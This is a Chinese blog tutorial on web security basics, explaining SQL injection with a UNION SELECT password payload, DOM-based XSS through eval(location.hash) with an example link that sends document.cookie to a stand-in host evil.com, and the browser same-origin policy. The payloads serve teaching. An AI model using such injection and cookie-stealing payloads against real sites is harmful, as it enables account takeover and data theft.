web安全的关键点

最新推荐文章于 2022-03-28 16:47:03 发布
最新推荐文章于 2022-03-28 16:47:03 发布
阅读量333 收藏 1
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaohua_de/article/details/77800780
版权

  数据和指令混杂在一个页面是导致WEB不安全等重要因素,数据会被指令污染。


1 Sql 注入的例子:

用户通过访问连接http://www.foo.com/user.php?id=1 来获取自身账户的信息,后台可能会执行select username , email , desc from users where id=1; 然后把返回的结果通过HTTP返回给客户端。

其中id的值来自用户等提交,如果攻击者把1 替换为 “1 union select password, 1 , 1 frorn users ”则整个语句在后台的查询语句就变成了

select usernarne, ernail , desc frorn users where id=l union select password, 1 , 1 from users 这是一个合法union SQL语句. 这就导致用户信息等泄露。攻击者可以随便制定id的值。




2 XSS跨站攻击的发生

 <script>

eval(location.hash.substr(1));

</script>

将这段代码保存到http://www.foo.com/info.html中(需要自己搭建http服务器)

eval是JS的内置函数,可以动态的执行JS语句,location.hash获得是链接http://www.foo.com/info.html#callback 中的#符号及其后面的内容。substr是字符串截取函数。

eval(location.hash.substr(1));表示截图#符号之后的内容,随后给eval函数进行动态执行。

可想如果攻击者构造出如下链接:

http:// www .foo.com/info.html#new%20Image().src =”http://www.evil.com/steal.php?c=" +escape(document .cookie ),浏览器执行后会变为

eval('new%20Image().src =”http://www.evil.com/steal.php?c=" +escape(document .cookie)')

当小白点击了上面链接之后,cookies会话信息就会被盗取到黑客到网站上。一般情况下该cookies可以登录被攻击者的账号,并进行越权操作。





同源策略规定:不同域的客户端脚本在没明确授权的情况下,不能读写对方的资源。

1  不同域或者同域

站    点                      是否同域 原因
https://www.foo.com 不同域协议不同, https与http是不同的协议
http://xeyeteam.foo.com 不同域域名不同, xeyeteam子域与www子域不同
http://foo.com 不同域域名不同, 顶级域与www子域不是一个概念
http://www.foo.com:8080 不同域端口不同, 8080与默认的80端口不同
http://www.foo.com/a/ 同域满足同协议、 同域名、同端口,只是这里多了一个目录而已

从上面看出我们通常所说的两个站点同域就是指它们同源。


2  客户端脚本

客户端脚本主要指JavaScript(各个浏览器原生态支持的脚本语言)、ActionScript(Flash的脚本语言),以及JavaScript与ActionScript都遵循的ECMAScript脚本标准。Flash提供通信接口,使得这两个脚本语言可以很方便地互相通信。客户端的攻击几乎都是基于这两个脚本语言进行的,当然JavaScript是最广泛的。



3.授权


一般情况下,看到这个词,我们往往会想到服务端对客户端访问的授权。客户端也存在授权现象,比如:HTML5新标准中提到关于AJAX跨域访问的情况,默认情况下是不允许跨域访问的,只有目标站点(假如是http://www.foo.com)明确返回HTTP响应头:


Access-Control-Allow-Origin: http://www.evil.com


那么www.evil.com站点上的客户端脚本就有权通过AJAX技术对www.foo.com上的数据进行读写操作。这方面的攻防细节很有趣,相关内容在后面会详细介绍。


 注: AJAX是Asynchronous JavaScript And XML的缩写,让数据在后台进行异步传输,常见的使用场景有:对网页的局部数据进行更新时,不需要刷新整个网页,以节省带宽资源。AJAX也是黑客进行Web客户端攻击常用的技术,因为这样攻击就可以悄无声息地在浏览器后台进行,做到“杀人无形”。



4.读写权限


Web上的资源有很多,有的只有读权限,有的同时拥有读和写的权限。比如:HTTP请求头里的Referer(表示请求来源)只可读,而document.cookie则具备读写权限。这样的区分也是为了安全上的考虑。


5.资源


资源是一个很广泛的概念,只要是数据,都可以认为是资源。同源策略里的资源是指Web客户端的资源。一般来说,资源包括:HTTP消息头、整个DOM树、浏览器存储(如:Cookies、Flash Cookies、localStorage等)。客户端安全威胁都是围绕这些资源进行的。

iihacker_cat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 学习笔记
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
metasploit 初学(一)
小山岷的专栏
11-24 2万+
每个人都有死穴,在武侠片中经常可以看到,点到某人死穴,轻者此人被控、武功被废,重则当场瘫痪或毙命。可以参考武侠片各种大侠。 对于系统而言,存在有或多或少的漏洞,而这些漏洞则很容易被攻击者利用,并成功渗透入主机。 只有了解如何渗透,才能进行反渗透。 metasploit是渗透测试很流行的工具,最近开始记录学习metasploit的过程: 一 安装: 1 对于64位系统: wget h
Metasploit技术(一)——Metasploit简介与基础
Phantom03167的博客
03-28 9234
Metasploit简介与基础
Metasploit入门用法(主动攻击)
热门推荐
shark-CV的博客
06-03 8万+
Metasploit入门用法(主动攻击) –作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。
Metasploit简介
zhangnipa的博客
03-17 732
MSF简介: metaspoilt是一个漏洞框架,全称为 THE Metasploit Framework,简称MSF MSF 命令全集 MSF的基本模块 MSF渗透步骤 一、扫描目标系统,寻找可利用的漏洞 二、选择并配置一个漏洞利用模块 三、选择并配置一个攻击载荷模块 四、选择一个编码技术,用来绕过杀毒软件的查杀 五、渗透攻击 实战演示 我准备了两台虚拟机 kali 192.168.57.135 windows7 192.168.57.137 先查看metasploit集成的payload show p
WEB安全知识点
PatrickStar131的博客
11-10 3874
SQL注入: 原理: 指web应用程序对用户输入的数据合法性没有判断,导致攻击者可以构造不同的sql语句来对数据库数据库的操作。(web应用程序对用户输入的数据没有进行过滤,或者过滤不严,就把sql语句带进数据库中进行查询)。 Sql注入漏洞的产生需要满足两个条件: ①参数用户可控:前端传给后端的参数内容是用户可以控制的。 ②参数代入数据库查询:传入的参数拼接到sql语句,且带入数据库查询。 危害 ①数据库信息泄漏:数据库中存放的用户的隐私信息的泄露。 ②网页篡改:通过操作数据库对...
Web安全基本概念
weixin_43994244的博客
03-04 7192
域名 什么是域名? 域名(Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置)。 例:www.baidu.com DNS 什么是 DNS? 域名系统(Domain Name System,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用UDP端口53。当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过2
Java安全知识点总结
最新发布
04-20
Java安全知识点涵盖了一...安全配置:Java应用程序的安全配置文件(如Web.xml、application.properties)需要正确设置,以防止常见的安全风险。这包括关闭不必要的服务、限制访问权限、启用安全传输协议(如HTTPS)等。
核心 线下支付技术集成关键点.pdf
08-23
核心 线下支付技术集成关键点 区块链 web安全 系统安全 金融安全 安全实践
网络安全原理与应用:网络信息收集.pptx
05-16
攻防对抗(博弈):对敌方信息的掌握是关键! 攻击者:先发制人,收集目标信息; 防御者:后发制人,对攻击者试试信息收集,归因溯源; 网络信息收集 二、网络信息收集的内容 1、网络攻击者信息收集 2、网络防御者...
Ajax安全技术
06-14
通读《AJAX安全技术》你将看到很多用于阐述关键知识点的真实Ajax安全漏洞案例。在书中还讲到保护Ajax应用的特殊方法,包括每种主要Web编程语言(.NET、Java和PHP)及流行新语言RubyonRails。 《AJAX安全技术》一书对...
毕业论文基于web的机房管理系统设计与实现
01-19
对实验室的全方位开放,是适应教育事业的迅猛发展,是跟上信息时代的 步伐,是学生主动学习计算机知识的基础条件。为能使学生能够更多的学习计算 ...合,以方便性,安全性,稳定性,易操作性为特点。
浏览器的同源策略
weixin_34183910的博客
02-20 126
浏览器的同源策略 古代的楚河汉界明确规定了楚汉两军的活动界限,理应遵守,否则必天下大乱,而事实上天下曾大乱后又统一。这里我们不用管这些“分久必合,合久必分”的问题,关键是看到这里规定的“界限”。Web世界之所以能如此美好地呈现在我们面前,多亏了浏览器的功劳,不过浏览器不是一个花瓶——只负责呈现,它还制定了一些安全策略,这些安全策略有效地保障了用户计算机的本地安全Web安全。  注: ...
burpsuite 安装和使用
nethm的专栏
09-16 1万+
burpsuite 安装 第一步:下载安装JDK  我安装的版本是jdk1.8.0_131,可以自行百度。 第二步:配置JAVA环境 1. 桌面-计算机-属性-高级系统设置-环境变量-系统变量  添加:JAVA_HOME C:\Program Files\Java\jdk1.8.0_131 编辑:Path ,在最前面新增 C:\Program Fi
firefox 搭配burpsuite
nethm的专栏
09-16 6643
BurpSuite 抓包的工作原理就是把作为一个代理,所以如果浏览器配置了代理,让网络走Burpsuite建立的网络,这样Burpsuite就可以抓到所有的包了。 1 设置firefox代理 选项--高级--网络--连接--设置 默认的不使用代理包括localhost和127.0.0.1 需要把他们去掉不然本地的包就抓不到了。 8080
关于Burp Suite Intruder 的四种攻击方式
nethm的专栏
05-12 4128
以下面这一段参数为例,被§§包围的部分为需要破解的部分:user=§ss§&amp;password=§zxcv§&amp;imageField.x=17&amp;imageField.y=1 (1) (2) ---------------------------------------------------------- payload1 = [admin,...
使用python对登录密码爆破
nethm的专栏
09-17 3020
运行后的结果: send the request to get the init user token, respons state code = 200 response page size= 4979 we will use bruteforce way to get the correct password by using dictionary paylo ad
web安全方向
nethm的专栏
09-02 1061
安全关注点转移,从最开始的服务器安全,如缓冲区溢出,CGI解析缺陷,纯web层面的sql注入的,到客户端安全如XSS跨站脚本,CSRFf跨站请求伪造等。 前端安全主要有三类,xss,csrf,界面操作劫持,从xss到csrf再到界面操作劫持,越往后社会工程学,成分越浓厚.
使用surpsuite进行爆破
nethm的专栏
09-16 887
Surp可以对抓到的http包的参数进行配置,从而进行用户名和密码进行爆破。 1  假如我们知道有admin这个用户 2 开启burp抓包,并登录上面的web,这里用户名密码设置为1111  2222,抓到的包如下 3 把包的内容拷贝到Intruder中 4 使用Intruder修改http包中的参
web前端评估工作量都可能设计那些关键技术点
04-01
7. 前端安全:了解前端安全的相关知识,能够使用相关的技术和工具进行前端安全防护。 8. 模块化开发:熟悉模块化开发的相关知识,能够使用AMD、CommonJS等模块化规范进行前端开发。 9. 前端测试:了解前端测试的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值